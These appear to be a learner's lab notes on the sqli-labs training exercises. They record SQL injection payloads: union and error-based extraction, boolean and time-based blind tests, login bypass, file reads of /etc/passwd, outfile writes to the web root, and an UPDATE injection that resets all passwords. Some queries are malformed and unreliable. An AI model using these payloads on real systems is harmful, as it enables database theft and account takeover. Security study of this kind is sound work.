http://192.168.93.156/sqli/Less-3/?id=1') order by 3 --+ --> Results are displayed
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,5,4 --+
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,database(),version() --+
database name = security
sql version = 5.5.59-0ubuntu0.14.04.1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:4
URL: http://192.168.93.156/sqli/Less-4/?id=1"
http://192.168.93.156/sqli/Less-4/?id=1" --> Broken the code
' " 1" ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") --> Broken the code
' ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") or (" --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1")--+ --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1") union select 1,2,3,4 or (" --> SELECT statements have a different number of columns
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,55,378 or (" --> 2nd coloumn is working
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,2,3 --+ --> 2nd and 3rd coloumn is working
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 5
URL: http://192.168.93.156/sqli/Less-5/?id=1
http://192.168.93.156/sqli/Less-5/?id=1' --> Code has broken for ['] and it is vulnerable with SQL injection[''1'' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1" --> Page displayed as normal and no vulnerable for ["]
http://192.168.93.156/sqli/Less-5/?id=1\ --> Code has broken for [\] and it is vulnerable with SQL injection[''1\' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1\ --+ --> Code has fixed by commenting out[--]
http://192.168.93.156/sqli/Less-5/?id=1' --+ --> Code has fixed by commenting out[--]
http://192.168.93.156/sqli/Less-5/?id=1' '1 --> Code has fixed by matching
http://192.168.93.156/sqli/Less-5/?id=1' order by 1 and '1 --> To find out a columns we used "order by" but didn't help
"Order by" doesnot work if you are not using commands. We have to go for trial and error.
http://192.168.93.156/sqli/Less-5/?id=1' union select 1 and '1 --> doesn't works
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2 and '1 --> doesn't works
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3 and '1 --> it works, means it has 3 columns
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3,4 and '1 --> doesn't works
Developer's query is,
select col1, col2, col3 from table_name where id='$your_input';
Since we are not getting any output displayed and we can able to see the output only in the form of sql error. If we are able to produce mysql error in a controlled way then we can extract, what information is required for the enumeration.
select count(*) from information_schema;
select rand();
select floor();
select floor(rand()*2);
here, title of the column shows what we have provide. We can use alias to it.
select floor(rand()*2)as dump; [or]
select floor(rand()*2)dump
useful: select table_name, table_schema from infomation_schema.tables group by table_schema;
select database();
select (select database());
select concat(select database());
select concat(0x3a,0x3a(select database())0x3a,0x3a); --> Hex value of ' is 0x3a
select concat(0x3a,0x3a(select database())0x3a,0x3a)as aaa; --> Alias has set to aaa
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa; --> Added some random with floor function
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns;
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.tables;
select count(*), concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa[0r]bbb; --> After some trys we got error messages. This error msg is generated by "Randomness" and it dumped as "Database: 'security'"
select count(*), concat(0x3a,0x3a(select version())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by bbb; --> It dumped as "Database version: 5.1.62"
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 1,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays second table name
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays third table name
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays first table name
(select 1 from (select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
(select 1 from (select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
By changing the limit values, we can get the name of the tables
To find out the column names,
(select 1 from (select count(*), concat(0x3a,0x3a(select column_name from information_schema.columns where table_name='users' limit 0,1)0x3a,0x3a, round(rand()*2,1))as aaa from information_schema.columns group by aaa)bbb);
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection:
localhost/sqli-labs/Less-5/?id=1
localhost/sqli-labs/Less-5/?id=2
localhost/sqli-labs/Less-5/?id=3
localhost/sqli-labs/Less-5/?id=1'
localhost/sqli-labs/Less-5/?id=1\
select col1,col2,col3 from table where id=' 1' OR '1 '
localhost/sqli-labs/Less-5/?id=1' --+
localhost/sqli-labs/Less-5/?id=1' #
There is no way to display the output from the database of our query. We have to create
an error messages in a controlled way to display of output from the database. hence it is
semi-blind SQL injection.
some functions from database,
mysql>select count(*) from information_schema.tables;
mysql>select count(*) from information_schema.columns;
mysql>select rand();
mysql>select rand()*4;
mysql>select floor(2.4536759379374);
mysql>select rand()*2;
mysql>select floor(rand()*2);
mysql>select floor(rand()*2)as dumb;
mysql>select floor(rand()*2)dumb;
mysql>select table_name,table_schema from information_schema.tables group by table_schema;
mysql>select database();
mysql>select (select databasae());
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a);
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a)a;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.columns;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables;
mysql>select count(*), concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select version())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select user())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
--> error, subquery returns more than 1 row bcoz we didn't define the LIMIT function
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 1,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 3,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection: Continued...
select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
Need to use paranthesis '()' in frontend
(select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a) ->> it gave an error, i.e., operand should contain 1 column
To fix the above query,
(select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b)
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
we can use "round" function instead of floor,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x3a,0x3a, round(rand()*2,1))a from information_schema.columns group by a))
we can enumurate even column name as well,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.column where table_name="users" limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --> displays the value of 1st column
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.column where table_name="users" limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --> displays the value of 2nd
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Boolean Based
URL: localhost/sqli-labs/Less-8/?id-1
localhost/sqli-labs/Less-8/?id-1' --> didn't get a result
localhost/sqli-labs/Less-8/?id-1' --+ --> some results are displayed as expected
localhost/sqli-labs/Less-8/?id-1' AND 1 --+ --> displayed some results
localhost/sqli-labs/Less-8/?id-1' AND 0 --+ --> intentional false statement, result as expected
If we inject a query, we don't get any in the display as it is a blind based sql injection.
Even errors are also missing.
From backend database,
use security;
select database();
select length(database());
select substr(database(),1,1); --> substring function takes 3 parameters,(string, where to start counting, how much to count for)
select ascii(substr(database(),1,1));
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select database()),1,1)))=98 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>102 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>101 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
We can use the tools for the same like,
Burp, ZAP, Fiddler
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Time Based
In previos lessions we found something dumping in the screen as it has visible sign to gave us an idea.
But in this, we don't have any sign or differentiation
From backend database, we learn function called sleep()
mysql>use security;
mysql>select sleep(10); --> waiting 10 sec to display the results
We use timecharacter to make results as true or false.
mysql>select if(condition,value return if condition is true, value return if condition is false)
mysql>select if((select database())="security",sleep(10),null);
As there is no sign of sql injection vulnerable in screen will make use of sleep() function,
from application,
localhost/sqli-labs/Less-9/?id=1' and sleep(10) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select database())="security",sleep(10),null) --+ --> --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select version()) like "5%",sleep(10),null) --+ --> --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database()),sleep(10),null) --+ --> --> it works
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database Using Outfile:
localhost/sqli-labs/Less-7/?id=1 --> Normal results displayed. URL
localhost/sqli-labs/Less-7/?id=7 --> No error
localhost/sqli-labs/Less-7/?id=50 --> Error message
localhost/sqli-labs/Less-7/?id=news --> Error message
localhost/sqli-labs/Less-7/?id=\ --> Error message
localhost/sqli-labs/Less-7/?id=1' --> Error message
localhost/sqli-labs/Less-7/?id=1" --> No Error message
localhost/sqli-labs/Less-7/?id=1' --+ --> Query didn't fixed
localhost/sqli-labs/Less-7/?id=1') --+ --> Query didn't fixed
localhost/sqli-labs/Less-7/?id=1')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=2')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')) (('1 --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')){execute command safely} --+ --> Query fixed
Database backend:
use database;
select * from users;
select * from users into outfile "/tmp/test.txt"; -->> Just dumping complete file into test.txt
select * from users into dumpfile "/tmp/test1.txt"; -->> Error, dumpfile command can dump a single line not more than that
select * from users limit 0,1 into dumpfile "/tmp/test1.txt"; -->> Error, dumpfile cannot be able to overwrite an existing file
[mysql should not run with root privilege]
select load_file("/etc/passwd") into outfile "/tmp/test4.txt"; -->>
localhost/sqli-labs/Less-7/?id=1'))order by 4 --+ -->> displayed error msg
localhost/sqli-labs/Less-7/?id=1'))order by 3 --+ -->> not dispalyed any error
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+ -->>
localhost/sqli-labs/Less-7/union1.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1, database(),version() into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+ -->>
localhost/sqli-labs/Less-7/union2.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1,select table_name from information_schema.tables where table_schema='security',version() into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+ -->>
localhost/sqli-labs/Less-7/union3.txt
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database:
localhost/sqli-labs/Less-7/?id=1')) --+
localhost/sqli-labs/Less-7/?id=1')) or (('1
will test from backend in the database,
mysql>select security;
mysql>show tables;
mysql>select * from users;
mysql>select * from users into outfile "/tmp/test.txt"
mysql>select * from users into dumpfile "/tmp/test1.txt"
mysql>select * from users limit 0,1 into dumpfile "/tmp/test1.txt"
mysql>select * from users limit 0,1 into dumpfile "/tmp/test2.txt"
Outfile: It just dump the results of the query to a file.
Dumpfile: It dumps only one line in a file and it cannot be overwrite the existing file.
To get rectified this problem will use limit function.
Loadfile: It is used to load the files from filesystem to mysql
mysql>select load_file("/etc/passwd");
mysql>select load_file("/etc/passwd") into outfile "/tmp/test3.txt";
localhost/sqli-labs/Less-7/?id=1')) order by 3 --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile"/tmp/test4.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,database(),version() into outfile"/var/www/sqli-labs/Less-7/union1.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables where table_schema=security() into outfile"/var/www/sqli-labs/Less-7/union2.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables into outfile"/var/www/sqli-labs/Less-7/union3.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,usersname,password from users into outfile"/var/www/sqli-labs/Less-7/union4.txt" --+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Error Based
localhost/sqli-labs/Less-12/
below are the test senario to break the query,
'
"
''
""
')
")
\
below to fix the query which is breaking,
") --(space) OR ") # OR try ") --+
") or 1=1 #
") or 1=1 LIMIT0,1 #
") or 1=1 LIMIT1,1 #
") or 1=1 LIMIT2,1 #
") or 1=1 LIMIT3,1 #
to find out how many columns are used by the developer with below "order by" function,
") order by 4 #
") order by 3 #
") order by 2 #
'""") and password=("") LIMIT 0,1'
'"\") and password=("") LIMIT 0,1'
select * from table where username=("$uname") and password=("$passwd") LIMIT0,1
select col1, col2 from table where username=("$uname") and password=("$passwd") LIMIT0,1
") union select 1,2 #
") union select database(),version() #
") union select 1,table from information_schema.tables where table_schema=database() #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 1,1 #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 2,1 #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 3,1 #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Double Query based
localhost/sqli-labs/Less-14/
try to use the combination of strings, numbers and special characters
9834756 --> failed login attempts
admin/admin --> failed login attempts
9849357/admin --> failed login attempts
admin/password --> failed login attempts
' --> didn't breaks the query
'/' --> didn't breaks the query
') --> didn't breaks the query
;)) --> didn't breaks the query
" --> success, breaks the query
" -- OR " # --> fixing the query
" # --> failed login attempts
" or 1=1 # --> successfully logged-in
from database backend,
mysql>use security;
mysql>select database();
mysql>select concat((select database()));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2)) from information_schema.tables;
mysql>select (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables;
mysql>select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c;
select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a
in front end i.e website login page,
' AND (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection BLIND Boolean and Timebased
localhost/sqli-labs/Less-16/
try all the possibilities to break the query,
since it is a blind we will assume that we broken the query. We will come to know the what breaks the query while fixing the query by guessing.
' # OR " # OR ') # OR ") # OR ')) # OR ")) #
") or 1=1 # --> fix the query, means ") is used by the delevoper
") and sleep(10) # --> didn't worked
") or sleep(10) # --> it worked, displayed as "waiting for localhost"
developer query is like,
select col1, col2 from table where username=("") AND sleep(15) # ") and password=("some data"); --> didn't worked
select col1, col2 from table where username=("SOME DATA") AND sleep(15) # ") and password=("some data"); --> it worked
Timebased:
admin") and if(1=1,sleep(10),null) #
admin") and if(database()='security',sleep(10),null) #
Boolean based:
admin") and (select database()='security') #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection in UPDATE Query
localhost/sqli-labs/Less-17/
URL loaded is a password reset page.
from backend database,
mysql>select * from users where username="admin";
mysql>update users SET password='12345' where username='admin';
assuming the query created by the developer is,
UPDATE users SET password="some variable" where username="admin";
here by the combination of value like,
'/' --> didn't break
"/" --> didn't break
' --> didn't break
" --> didn't break
/ --> didn't break
admin/' --> broken
admin/' or 1=1 # --> successfully loggedin, means fixed the query
the above query has changed the password for all the users in the users table,
UPDATE users SET password='' or 1=1 # ' where username='admin';
Since it is a password updation page, it is not interacting with the users(displaying anything to us from the databse) and hence will use DOUBLE QUERY INJECTION to display some errors, through this will enumurate all information we want.
' AND (select 1 from (select count(*),(concat("~",(select @@datadir),"~",floor(rand(0)*2) from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Injection in INSERT QUERY
localhost/sqli-labs/Less-18/
INSERT is an sql query where we will update the records to database.
to enumurate, if we enter admin/admin, it displays the useragent records. there is a point to fuzz and breaks the query.
to fuzz on user agents fields particularly, we need to intercept the requested data. for that will use a firefox plugin as "Tamper Data" OR any of the "Inceptor proxy". eg:// Burpsuite, ZAP, etc
from tampered data, by changing the value of user agent as below,
User-Agent: \ --> breaks the query
User-Agent: ' --> braks the query
User-Agent: ' or '1'='1 --> fixed the query, successfully logged-in
Injection in the parameter value in the INSERT query.
The way of getting the results here is DOUBLE CODE INJECTION as there is no direct interaction of attacker to the database.